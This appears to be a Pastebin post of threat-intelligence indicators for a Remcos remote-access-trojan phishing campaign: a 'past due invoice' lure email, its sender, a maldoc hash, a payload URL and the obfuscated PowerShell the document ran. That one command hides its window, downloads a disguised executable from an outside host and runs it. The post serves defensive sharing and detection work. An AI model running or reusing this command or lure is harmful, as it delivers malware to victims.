API tools faq
paste
Advertisement
pandazheng

Remcos IOCs

pandazheng
Oct 11th, 2021
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
raw download clone embed print report
  1. Remcos IOCs
  2. https://github.com/executemalware/Malware-IOCs/blob/main/2021-10-11%20Remcos%20IOCs
  3.  
  4. THREAT IDENTIFICATION: REMCOS
  5.  
  6. SUBJECTS OBSERVED
  7. PAST DUE INVOICE
  8.  
  9. SENDERS OBSERVED
  10. sejongkj@daum.net
  11.  
  12. EMAIL BODY
  13. Good afternoon,
  14.  
  15. I need to confirm the following
  16.  
  17. Attached find past due invoice details for your records,
  18.  
  19. Kind regards,
  20.  
  21. MALDOC FILE HASHES
  22. PAST DUE INVOICE.xls
  23. 092fd1fae341ede766b93f694c4ea0bf
  24.  
  25. POWERSHELL FROM MALDOC
  26. C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Sou
  27. rce htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Pu
  28. blic\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
  29.  
  30. PAYLOAD URL
  31. http://thepunchlineexpose.com/Manager/AnyDesk.exe
  32.  
  33. REMCOS C2
  34. No C2 traffic observed - the payload url was 404
  35.  
  36. SUPPORTING EVIDENCE
  37. https://urlhaus.abuse.ch/browse.php?search=thepunchlineexpose.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!